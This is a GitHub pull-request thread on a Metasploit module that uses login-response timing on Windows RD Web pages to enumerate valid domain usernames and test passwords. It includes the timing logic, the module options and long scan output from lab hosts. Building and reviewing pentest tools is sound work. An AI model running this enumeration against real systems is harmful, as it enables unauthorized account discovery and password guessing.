192.168.134.140 192.168.134.140 443/tcp (RDWeb) www
192.168.134.140 192.168.134.140 443/tcp (RDWeb) www-data
192.168.134.140 192.168.134.140 443/tcp (RDWeb) xpdb
192.168.134.140 192.168.134.140 443/tcp (RDWeb) xpopr
192.168.134.140 192.168.134.140 443/tcp (RDWeb) zabbix

msf6 auxiliary(scanner/http/rdp_web_login) >

</details>

k0pak4 · 2021-01-20T00:32:24Z

@bwatters-r7 thanks for the feedback and for going through the testing! I also tested a 2016 DC so it's nice to see it works there as well. As for the three items:

I'm also not sure how the module should act when there is no connection. I can see if I can get a different error code with a service that doesn't exist vs one that does but times out. I'm currently doing a try/except with the request timeout but I can see if I can get a differentiation. I'd also be happy if you had more direction on what it should do though, since I'm also not familiar with what the proper behavior would be. If I can differentiate, that does feel better though right?
On the successful run, do you have a suggestion as to how I can get the realm (domain) added properly? I made an attempt to do so when I add the credential but it isn't getting added and I'm not sure where I'm going wrong
So this behavior is slightly expected I guess because the default timeout is from testing against an internet hosted service. When I test against a local DC, you need to set the timeout much lower. In my screenshot above I did this against a 2019 Windows Server. Are you hosting RD Web on the same server as your DC? It might make the time difference more negligible. In my setup I have two Windows 2019 Servers, one is the DC and the other is hosting RDWeb (all virtual machines).

k0pak4 · 2021-01-20T11:35:09Z

@bwatters-r7 I did some more investigation into your problems with the long user list. I can recreate the issue when the password is blank but making it any string fixes it. I ran through this with the module and in BurpSuite and it appears that when authentication attempts with blank passwords are made, the timing attack is ineffective. I didn't notice it initially, because I have the password default to 'wrong'. When any string is put into the password field, the timing discrepancies appear again

bwatters-r7 · 2021-01-21T23:16:27Z

Let me try to give you some more info; I may have glossed over some things, and also I don't have the depth of knowledge on some aspects on this technique

For the timeout case, it looks like if you get the response 302, the password and username are good (successful), if you get the response 200, the password is invalid, but the username is valid. We'd assume that a timeout was a separate issue? Therefore, I would propose to simply pass the exception through like https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py#L154
There, in the case of a timeout, it just returns the string Timeout waiting for alert In this case, maybe just timeout error.

I can't do too much about the domain reporting without doing a lot more digging. @acammack-r7 might be able to chime in quick, but otherwise, I'll start digging.

k0pak4 · 2021-01-22T11:30:53Z

Let me try to give you some more info; I may have glossed over some things, and also I don't have the depth of knowledge on some aspects on this technique

For the timeout case, it looks like if you get the response 302, the password and username are good (successful), if you get the response 200, the password is invalid, but the username is valid. We'd assume that a timeout was a separate issue? Therefore, I would propose to simply pass the exception through like https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py#L154
There, in the case of a timeout, it just returns the string Timeout waiting for alert In this case, maybe just timeout error.

I can't do too much about the domain reporting without doing a lot more digging. @acammack-r7 might be able to chime in quick, but otherwise, I'll start digging.

Interesting, the module you referenced is using raw sockets though where I'm using the requests library. So the idea was that rather than wait for the response and then check that it is passed the user set threshold, that by using a requests timeout the module would be faster. In my initial testing, invalid authentication attempts were taking over 4 seconds, whereas valid usernames take around 200 milliseconds. Thus, I set up the auth to go like the following:

If we get a response that's a 302, it's a valid login pair
If we get a response within the timeout threshold, it's a valid username
If we timeout the response, it's an invalid username

I could change it to the following:

If we get a response that's a 302, it's a valid login pair
If we get a response within the timeout threshold, it's a valid username
If we get a response outside the timeout threshold, it's an invalid username
If we timeout the response, the host is down.
This does have a drawback because it will bloat the overall scan times since we don't need to wait the full amount of time for every response just to compare it to a timeout threshold. In the initital example I was working with where I set the threshold to 1500 milliseconds, this change would up every invalid username scanned from 1.5s to 4s which is fairly significant. This problem is conflated that the requests library doesn't have a default timeout and will hang indefinitely, so I'd need to set ~~something~~ as the timeout anyway to determine if the host is down. If you think the second approach is better I can change it to that, but maybe it would be better to just do an initial check to see if the host is up before initiating the scan? Then we could leave it as a quicker scan, but alleviate concerns of reporting a bunch of invalid usernames when the host is just down

bwatters-r7 · 2021-01-22T19:27:43Z

I think I've started this reply a half dozen times.

First, I appreciate the breakdown you gave above, it really helped me understand what was happening.

Second I think we should give the user control over the timeout somehow. Different networks will behave differently, so I could see edge case where users should be able to control the timeout. Likely that would be more of an advanced option with the default values you have found work correctly.

~~Second~~ Third, I really like your idea of checking the service first. Maybe you could add a boolean option called verify_service defaulting to true that would just fire a quick check to catch people like me who did not verify the service before scanning?

I still owe you an answer on the domain thing, but that's unlikely to come for a couple days.

bwatters-r7 · 2021-01-25T16:31:18Z

Roger. I'll try to move the RDP web server to a different VM in the network so I can test.

…articular user agents

bwatters-r7 · 2021-01-29T14:11:20Z

I'm having some trouble checking this again. I added a new 2016 server to my domain and added the web rdp service to it, but I'm getting an error when I try to scan both the new target and the old DC (still running a web rdp client).
The new server is 192.168.132.184, the old one is 192.168.132.170:

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.170                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain          testdomain                                                            no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         2000                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[-] HTTPSConnectionPool(host='192.168.132.170', port=443): Max retries exceeded with url: //RDWeb/Pages/en-US/login.aspx (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
[-] Service appears to be down, no response in 2000 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.184
rhosts => 192.168.132.184
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[-] HTTPSConnectionPool(host='192.168.132.184', port=443): Max retries exceeded with url: //RDWeb/Pages/en-US/login.aspx (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
[-] Service appears to be down, no response in 2000 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) >

When I navigate to the server from firefox on the host running metasploit, I get the "untrusted cert error," but I can get to the login just fine:

Kind of odd the cert error is suddenly creeping in. I don't suppose this is something you've run into?

k0pak4 · 2021-01-29T14:50:58Z

@bwatters-r7 I haven't run into this SSL cert issue, no. I don't think my most recent set of changes should have caused this either, since I just introduced the user_agent variable in order to get around a new host I was targeting that only allowed certain user agents 🤔

bwatters-r7 · 2021-01-29T17:22:31Z

When I drop back to b962f41, it works again without the cert error:

msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.170
rhosts => 192.168.132.170
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[+] Service is up, beginning scan...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 40.551 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.184
rhosts => 192.168.132.184
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[+] Service is up, beginning scan...
[+] Password  is invalid but testdomain\Administrator is valid! Response received in 51.449 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) >

k0pak4 · 2021-01-29T18:30:55Z

@bwatters-r7 I see where I went wrong, thanks for helping identify this. I had removed the verify=False from the service verification step. I hadn't noticed because I was testing against valid certs. Thanks for finding this! That part should be fixed in the most recent commit

bwatters-r7 · 2021-01-29T18:49:31Z

Sweet! I was staring at those user strings, but I did not catch that.

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.184                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain          testdomain                                                            no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         1250                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Password wrong is invalid but testdomain\Administrator is valid! Response received in 53.609 milliseconds
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) > set rhosts 192.168.132.170
rhosts => 192.168.132.170
msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.170...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.170 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.170 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.170 - %s://%s:%s "%s %s %s" %s %s
[+] Password wrong is invalid but testdomain\Administrator is valid! Response received in 60.73 milliseconds
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/rdp_web_login) >

bwatters-r7 · 2021-01-29T18:50:27Z

Still curious about those weird print format statements. Also, did you ever get the answer on adding the domain to the datastore?

k0pak4 · 2021-01-29T19:16:38Z

Still curious about those weird print format statements. Also, did you ever get the answer on adding the domain to the datastore?

I tried investigating the print format statements and couldn't find them anywhere in the library, which I found strange. It could just be my greps weren't good enough. And I haven't gotten the answer on the domain either. I felt like I added it right, but for some reason wasn't getting any errors when I added it but it still wasn't showing up in the db. I thought my changes to external.rb would do it, but it hasn't worked

bwatters-r7 · 2021-01-29T19:59:24Z

So I threw out a quick question to the team and got a PR back for the log issue:
#14684

k0pak4 · 2021-01-29T20:27:59Z

So I threw out a quick question to the team and got a PR back for the log issue:
#14684

Oh wow that's great! Thanks!

acammack-r7 · 2021-02-04T15:40:44Z

lib/msf/core/module/external.rb

+    credential_data[:public_data] = data['domain']
+    credential_data[:public_type] = :realm


Instead of changing the credential type, I think this just needs to add a realm to the credential data:

Suggested change

credential_data[:public_data] = data['domain']

credential_data[:public_type] = :realm

credential_data[:realm] = data['domain']

I just tried this, but it doesn't seem to work either. I'm wondering if the create_credential function called at the end isn't handling the realm after it's added or something or if I'm still passing it in incorrectly. I've tried adding it with :realm_key as well because i saw that as I was searching but it didn't seem to work either

Edit: I've verified I'm sending the 'domain' in the json:
{'domain': 'DUNN', 'address': '192.168.148.128', 'port': '443', 'protocol': 'tcp', 'service_name': 'RDWeb', 'username': 'k0pak4'} but for some reason the realm isn't sticking even with the suggested change

acammack-r7 · 2021-02-11T15:39:18Z

lib/msf/core/module/external.rb

@@ -152,6 +152,11 @@ def handle_credential_login(data, mod)
    credential_data[:private_type] = :password
  end

+  if data.has_key?(:domain)


My apologies, this will also need to be changed since all keys in data are strings:

Suggested change

if data.has_key?(:domain)

if data.has_key?('domain')

So this isn't working either, (though it could be an issue). When I remove the conditional completely, and just blindly add it to the credential_data, it still isn't appearing in the creds database as a realm. I've tried this multiple ways, including:

credential_data.merge({realm: data['domain']})

credential_data[:realm] = data['domain']
So I'm not sure why it isn't getting added at this point 😕

@acammack-r7 I got it! It turns out the fix was using :realm_key and :realm_value. I then added this is to password reporting, since it didn't exist there either. This should be good to go now!

k0pak4 · 2021-02-17T13:18:27Z

@acammack-r7 @bwatters-r7 I'm finished with requested updates now with the domain reporting complete. I updated the documentation to reflect the module updates as well, and have rerun msftidy on the docs to verify compliance as well as running pylint on the created module. Let me know what else I can do to help get this ready for approval

bwatters-r7 · 2021-02-18T17:10:16Z

Hi there, @k0pak4 ! Thanks so much for the updates.
Unfortunately, some of our team (myself included) were in the path of the winter storm that just hit the US, so we're dealing with unreliable and intermittent power outages around us. That means most of my infrastructure for testing is offline to make room on the grid for more important things and to protect the hardware from fluctuations.
I'm sorry to say that means that this will probably sit around until next week when I can power on the test range again.
Thanks again for being patient and awesome through this whole process!

k0pak4 · 2021-02-18T20:13:46Z

@bwatters-r7 no worries! Keep yourself and the team safe! This will still be here afterwards 🙂

bwatters-r7 · 2021-02-22T22:42:52Z

OK; back up and running. Now, I'm still not getting the timing. I've got the web_rdp running on a separate VM from the DC, and the timing just does not seem to be there:

Output

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[+] Service is up, beginning scan...
[+] Password wrong is invalid but testdomain\ is valid! Response received in 72.419 milliseconds
[+] Password wrong is invalid but testdomain\4Dgifts is valid! Response received in 62.009 milliseconds
[+] Password wrong is invalid but testdomain\abrt is valid! Response received in 75.359 milliseconds
[+] Password wrong is invalid but testdomain\adm is valid! Response received in 96.745 milliseconds
[+] Password wrong is invalid but testdomain\admin is valid! Response received in 71.325 milliseconds
[+] Password wrong is invalid but testdomain\administrator is valid! Response received in 76.675 milliseconds
[+] Password wrong is invalid but testdomain\anon is valid! Response received in 77.206 milliseconds
[+] Password wrong is invalid but testdomain\_apt is valid! Response received in 75.6 milliseconds
[+] Password wrong is invalid but testdomain\arpwatch is valid! Response received in 75.787 milliseconds
[+] Password wrong is invalid but testdomain\auditor is valid! Response received in 75.818 milliseconds
[+] Password wrong is invalid but testdomain\avahi is valid! Response received in 76.057 milliseconds
[+] Password wrong is invalid but testdomain\avahi-autoipd is valid! Response received in 75.794 milliseconds
[+] Password wrong is invalid but testdomain\backup is valid! Response received in 61.143 milliseconds
[+] Password wrong is invalid but testdomain\bbs is valid! Response received in 61.98 milliseconds
[+] Password wrong is invalid but testdomain\beef-xss is valid! Response received in 75.382 milliseconds
[+] Password wrong is invalid but testdomain\bin is valid! Response received in 61.005 milliseconds
[+] Password wrong is invalid but testdomain\bitnami is valid! Response received in 61.717 milliseconds
[+] Password wrong is invalid but testdomain\checkfs is valid! Response received in 76.276 milliseconds
[+] Password wrong is invalid but testdomain\checkfsys is valid! Response received in 75.645 milliseconds
[+] Password wrong is invalid but testdomain\checksys is valid! Response received in 72.031 milliseconds
[+] Password wrong is invalid but testdomain\chronos is valid! Response received in 63.759 milliseconds
[+] Password wrong is invalid but testdomain\chrony is valid! Response received in 70.705 milliseconds
[+] Password wrong is invalid but testdomain\cmwlogin is valid! Response received in 62.248 milliseconds
[+] Password wrong is invalid but testdomain\cockpit-ws is valid! Response received in 74.928 milliseconds
[+] Password wrong is invalid but testdomain\colord is valid! Response received in 74.915 milliseconds
[+] Password wrong is invalid but testdomain\couchdb is valid! Response received in 83.786 milliseconds
[+] Password wrong is invalid but testdomain\cups-pk-helper is valid! Response received in 81.807 milliseconds
[+] Password wrong is invalid but testdomain\daemon is valid! Response received in 61.281 milliseconds
[+] Password wrong is invalid but testdomain\dbadmin is valid! Response received in 61.532 milliseconds
[+] Password wrong is invalid but testdomain\dbus is valid! Response received in 74.472 milliseconds
[+] Password wrong is invalid but testdomain\Debian-exim is valid! Response received in 77.66 milliseconds
[+] Password wrong is invalid but testdomain\Debian-snmp is valid! Response received in 76.153 milliseconds
[+] Password wrong is invalid but testdomain\demo is valid! Response received in 72.914 milliseconds
[+] Password wrong is invalid but testdomain\demos is valid! Response received in 75.501 milliseconds
[+] Password wrong is invalid but testdomain\diag is valid! Response received in 64.232 milliseconds
[+] Password wrong is invalid but testdomain\distccd is valid! Response received in 85.201 milliseconds
[+] Password wrong is invalid but testdomain\dni is valid! Response received in 59.86 milliseconds
[+] Password wrong is invalid but testdomain\dnsmasq is valid! Response received in 60.477 milliseconds
[+] Password wrong is invalid but testdomain\dradis is valid! Response received in 65.41 milliseconds
[+] Password wrong is invalid but testdomain\EZsetup is valid! Response received in 68.37 milliseconds
[+] Password wrong is invalid but testdomain\fal is valid! Response received in 62.103 milliseconds
[+] Password wrong is invalid but testdomain\fax is valid! Response received in 58.928 milliseconds
[+] Password wrong is invalid but testdomain\ftp is valid! Response received in 73.531 milliseconds
[+] Password wrong is invalid but testdomain\games is valid! Response received in 61.524 milliseconds
[+] Password wrong is invalid but testdomain\gdm is valid! Response received in 60.678 milliseconds
[+] Password wrong is invalid but testdomain\geoclue is valid! Response received in 58.809 milliseconds
[+] Password wrong is invalid but testdomain\gnats is valid! Response received in 59.547 milliseconds
[+] Password wrong is invalid but testdomain\gnome-initial-setup is valid! Response received in 68.724 milliseconds
[+] Password wrong is invalid but testdomain\gopher is valid! Response received in 68.163 milliseconds
[+] Password wrong is invalid but testdomain\gropher is valid! Response received in 58.576 milliseconds
[+] Password wrong is invalid but testdomain\guest is valid! Response received in 59.901 milliseconds
[+] Password wrong is invalid but testdomain\haldaemon is valid! Response received in 59.84 milliseconds
[+] Password wrong is invalid but testdomain\halt is valid! Response received in 61.234 milliseconds
[+] Password wrong is invalid but testdomain\hplip is valid! Response received in 61.216 milliseconds
[+] Password wrong is invalid but testdomain\inetsim is valid! Response received in 72.135 milliseconds
[+] Password wrong is invalid but testdomain\informix is valid! Response received in 67.978 milliseconds
[+] Password wrong is invalid but testdomain\install is valid! Response received in 74.064 milliseconds
[+] Password wrong is invalid but testdomain\iodine is valid! Response received in 62.507 milliseconds
[+] Password wrong is invalid but testdomain\irc is valid! Response received in 72.521 milliseconds
[+] Password wrong is invalid but testdomain\jet is valid! Response received in 59.146 milliseconds
[+] Password wrong is invalid but testdomain\karaf is valid! Response received in 61.418 milliseconds
[+] Password wrong is invalid but testdomain\kernoops is valid! Response received in 60.47 milliseconds
[+] Password wrong is invalid but testdomain\king-phisher is valid! Response received in 59.808 milliseconds
[+] Password wrong is invalid but testdomain\landscape is valid! Response received in 74.429 milliseconds
[+] Password wrong is invalid but testdomain\libstoragemgmt is valid! Response received in 74.612 milliseconds
[+] Password wrong is invalid but testdomain\libuuid is valid! Response received in 60.887 milliseconds
[+] Password wrong is invalid but testdomain\lightdm is valid! Response received in 60.232 milliseconds
[+] Password wrong is invalid but testdomain\list is valid! Response received in 87.809 milliseconds
[+] Password wrong is invalid but testdomain\listen is valid! Response received in 63.717 milliseconds
[+] Password wrong is invalid but testdomain\lp is valid! Response received in 71.844 milliseconds
[+] Password wrong is invalid but testdomain\lpadm is valid! Response received in 61.202 milliseconds
[+] Password wrong is invalid but testdomain\lpadmin is valid! Response received in 58.721 milliseconds
[+] Password wrong is invalid but testdomain\lxd is valid! Response received in 59.793 milliseconds
[+] Password wrong is invalid but testdomain\lynx is valid! Response received in 61.583 milliseconds
[+] Password wrong is invalid but testdomain\mail is valid! Response received in 61.207 milliseconds
[+] Password wrong is invalid but testdomain\man is valid! Response received in 61.748 milliseconds
[+] Password wrong is invalid but testdomain\me is valid! Response received in 60.069 milliseconds
[+] Password wrong is invalid but testdomain\messagebus is valid! Response received in 61.996 milliseconds
[+] Password wrong is invalid but testdomain\miredo is valid! Response received in 60.31 milliseconds
[+] Password wrong is invalid but testdomain\mountfs is valid! Response received in 60.163 milliseconds
[+] Password wrong is invalid but testdomain\mountfsys is valid! Response received in 59.809 milliseconds
[+] Password wrong is invalid but testdomain\mountsys is valid! Response received in 61.959 milliseconds
[+] Password wrong is invalid but testdomain\mysql is valid! Response received in 61.404 milliseconds
[+] Password wrong is invalid but testdomain\news is valid! Response received in 73.184 milliseconds
[+] Password wrong is invalid but testdomain\noaccess is valid! Response received in 60.996 milliseconds
[+] Password wrong is invalid but testdomain\nobody is valid! Response received in 58.953 milliseconds
[+] Password wrong is invalid but testdomain\nobody4 is valid! Response received in 59.602 milliseconds
[+] Password wrong is invalid but testdomain\ntp is valid! Response received in 57.899 milliseconds
[+] Password wrong is invalid but testdomain\nuucp is valid! Response received in 62.16 milliseconds
[+] Password wrong is invalid but testdomain\nxautomation is valid! Response received in 59.224 milliseconds
[+] Password wrong is invalid but testdomain\nxpgsql is valid! Response received in 61.645 milliseconds
[+] Password wrong is invalid but testdomain\omi is valid! Response received in 60.653 milliseconds
[+] Password wrong is invalid but testdomain\omsagent is valid! Response received in 73.401 milliseconds
[+] Password wrong is invalid but testdomain\operator is valid! Response received in 58.553 milliseconds
[+] Password wrong is invalid but testdomain\oracle is valid! Response received in 61.405 milliseconds
[+] Password wrong is invalid but testdomain\OutOfBox is valid! Response received in 61.976 milliseconds
[+] Password wrong is invalid but testdomain\pi is valid! Response received in 60.435 milliseconds
[+] Password wrong is invalid but testdomain\polkitd is valid! Response received in 59.835 milliseconds
[+] Password wrong is invalid but testdomain\pollinate is valid! Response received in 59.942 milliseconds
[+] Password wrong is invalid but testdomain\popr is valid! Response received in 74.971 milliseconds
[+] Password wrong is invalid but testdomain\postfix is valid! Response received in 73.244 milliseconds
[+] Password wrong is invalid but testdomain\postgres is valid! Response received in 62.279 milliseconds
[+] Password wrong is invalid but testdomain\postmaster is valid! Response received in 58.509 milliseconds
[+] Password wrong is invalid but testdomain\printer is valid! Response received in 63.359 milliseconds
[+] Password wrong is invalid but testdomain\proxy is valid! Response received in 73.651 milliseconds
[+] Password wrong is invalid but testdomain\pulse is valid! Response received in 75.824 milliseconds
[+] Password wrong is invalid but testdomain\redsocks is valid! Response received in 78.72 milliseconds
[+] Password wrong is invalid but testdomain\rfindd is valid! Response received in 69.472 milliseconds
[+] Password wrong is invalid but testdomain\rje is valid! Response received in 59.073 milliseconds
[+] Password wrong is invalid but testdomain\root is valid! Response received in 60.427 milliseconds
[+] Password wrong is invalid but testdomain\ROOT is valid! Response received in 57.261 milliseconds
[+] Password wrong is invalid but testdomain\rooty is valid! Response received in 62.071 milliseconds
[+] Password wrong is invalid but testdomain\rpc is valid! Response received in 73.715 milliseconds
[+] Password wrong is invalid but testdomain\rpcuser is valid! Response received in 76.684 milliseconds
[+] Password wrong is invalid but testdomain\rtkit is valid! Response received in 59.623 milliseconds
[+] Password wrong is invalid but testdomain\rwhod is valid! Response received in 59.785 milliseconds
[+] Password wrong is invalid but testdomain\saned is valid! Response received in 65.095 milliseconds
[+] Password wrong is invalid but testdomain\service is valid! Response received in 69.969 milliseconds
[+] Password wrong is invalid but testdomain\setroubleshoot is valid! Response received in 59.042 milliseconds
[+] Password wrong is invalid but testdomain\setup is valid! Response received in 58.74 milliseconds
[+] Password wrong is invalid but testdomain\sgiweb is valid! Response received in 59.75 milliseconds
[+] Password wrong is invalid but testdomain\shutdown is valid! Response received in 58.715 milliseconds
[+] Password wrong is invalid but testdomain\sigver is valid! Response received in 57.914 milliseconds
[+] Password wrong is invalid but testdomain\speech-dispatcher is valid! Response received in 61.399 milliseconds
[+] Password wrong is invalid but testdomain\sshd is valid! Response received in 61.376 milliseconds
[+] Password wrong is invalid but testdomain\sslh is valid! Response received in 61.328 milliseconds
[+] Password wrong is invalid but testdomain\sssd is valid! Response received in 61.79 milliseconds
[+] Password wrong is invalid but testdomain\stunnel4 is valid! Response received in 58.916 milliseconds
[+] Password wrong is invalid but testdomain\sym is valid! Response received in 59.229 milliseconds
[+] Password wrong is invalid but testdomain\symop is valid! Response received in 60.117 milliseconds
[+] Password wrong is invalid but testdomain\sync is valid! Response received in 57.147 milliseconds
[+] Password wrong is invalid but testdomain\sys is valid! Response received in 62.307 milliseconds
[+] Password wrong is invalid but testdomain\sysadm is valid! Response received in 80.249 milliseconds
[+] Password wrong is invalid but testdomain\sysadmin is valid! Response received in 69.735 milliseconds
[+] Password wrong is invalid but testdomain\sysbin is valid! Response received in 76.288 milliseconds
[+] Password wrong is invalid but testdomain\syslog is valid! Response received in 61.336 milliseconds
[+] Password wrong is invalid but testdomain\system_admin is valid! Response received in 60.093 milliseconds
[+] Password wrong is invalid but testdomain\systemd-bus-proxy is valid! Response received in 59.093 milliseconds
[+] Password wrong is invalid but testdomain\systemd-coredump is valid! Response received in 65.794 milliseconds
[+] Password wrong is invalid but testdomain\systemd-network is valid! Response received in 57.628 milliseconds
[+] Password wrong is invalid but testdomain\systemd-resolve is valid! Response received in 58.787 milliseconds
[+] Password wrong is invalid but testdomain\systemd-timesync is valid! Response received in 58.546 milliseconds
[+] Password wrong is invalid but testdomain\tcpdump is valid! Response received in 61.867 milliseconds
[+] Password wrong is invalid but testdomain\trouble is valid! Response received in 58.933 milliseconds
[+] Password wrong is invalid but testdomain\tss is valid! Response received in 59.5 milliseconds
[+] Password wrong is invalid but testdomain\udadmin is valid! Response received in 64.178 milliseconds
[+] Password wrong is invalid but testdomain\ultra is valid! Response received in 72.905 milliseconds
[+] Password wrong is invalid but testdomain\umountfs is valid! Response received in 61.497 milliseconds
[+] Password wrong is invalid but testdomain\umountfsys is valid! Response received in 59.133 milliseconds
[+] Password wrong is invalid but testdomain\umountsys is valid! Response received in 60.869 milliseconds
[+] Password wrong is invalid but testdomain\unix is valid! Response received in 59.312 milliseconds
[+] Password wrong is invalid but testdomain\unscd is valid! Response received in 59.459 milliseconds
[+] Password wrong is invalid but testdomain\us_admin is valid! Response received in 76.102 milliseconds
[+] Password wrong is invalid but testdomain\usbmux is valid! Response received in 62.765 milliseconds
[+] Password wrong is invalid but testdomain\user is valid! Response received in 71.429 milliseconds
[+] Password wrong is invalid but testdomain\uucp is valid! Response received in 76.316 milliseconds
[+] Password wrong is invalid but testdomain\uucpadm is valid! Response received in 60.484 milliseconds
[+] Password wrong is invalid but testdomain\uuidd is valid! Response received in 60.936 milliseconds
[+] Password wrong is invalid but testdomain\vagrant is valid! Response received in 76.194 milliseconds
[+] Password wrong is invalid but testdomain\varnish is valid! Response received in 60.492 milliseconds
[+] Password wrong is invalid but testdomain\web is valid! Response received in 61.06 milliseconds
[+] Password wrong is invalid but testdomain\webmaster is valid! Response received in 59.285 milliseconds
[+] Password wrong is invalid but testdomain\whoopsie is valid! Response received in 60.843 milliseconds
[+] Password wrong is invalid but testdomain\www is valid! Response received in 62.338 milliseconds
[+] Password wrong is invalid but testdomain\www-data is valid! Response received in 62.887 milliseconds
[+] Password wrong is invalid but testdomain\xpdb is valid! Response received in 57.389 milliseconds
[+] Password wrong is invalid but testdomain\xpopr is valid! Response received in 73.649 milliseconds
[+] Password wrong is invalid but testdomain\zabbix is valid! Response received in 62.042 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

k0pak4 · 2021-02-22T22:55:48Z

OK; back up and running. Now, I'm still not getting the timing. I've got the web_rdp running on a separate VM from the DC, and the timing just does not seem to be there:
Output

@bwatters-r7 I'm trying to think of other things that might be causing the difference. Are any of the ones you're using supposed to be valid? I suspected the Administrator one likely was. Based on the output you input the domain yourself, does the domain discovery feature work on this host?

bwatters-r7 · 2021-02-24T18:05:33Z

@k0pak4 I know Administrator is valid. Also, no, apparently the domain discovery does not work, either?

msf6 auxiliary(scanner/http/rdp_web_login) > show options

Module options (auxiliary/scanner/http/rdp_web_login):

   Name            Current Setting                                                       Required  Description
   ----            ---------------                                                       --------  -----------
   RHOSTS          192.168.132.184                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS         1                                                                     yes       The number of concurrent threads (max one per host)
   domain                                                                                no        The target AD domain
   enum_domain     true                                                                  no        Automatically enumerate AD domain using NTLM
   password                                                                              no        The password to try or path to a file of passwords
   rport           443                                                                   yes       Port to target
   targeturi       /RDWeb/Pages/en-US/login.aspx                                         yes       The base path to the RDP Web Client install
   timeout         1250                                                                  yes       Response timeout in milliseconds to consider username invalid
   user_agent      Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  no        User Agent string to use, defaults to Firefox
   username        Administrator                                                         yes       The username to verify or path to a file of usernames
   verify_service  true                                                                  no        Verify the service is up before performing login scan

msf6 auxiliary(scanner/http/rdp_web_login) > run

[*] Running for 192.168.132.184...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[+] Service is up, beginning scan...
[*] 192.168.132.184 - Starting new HTTPS connection (%d): %s:%s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
[*] 192.168.132.184 - %s://%s:%s "%s %s %s" %s %s
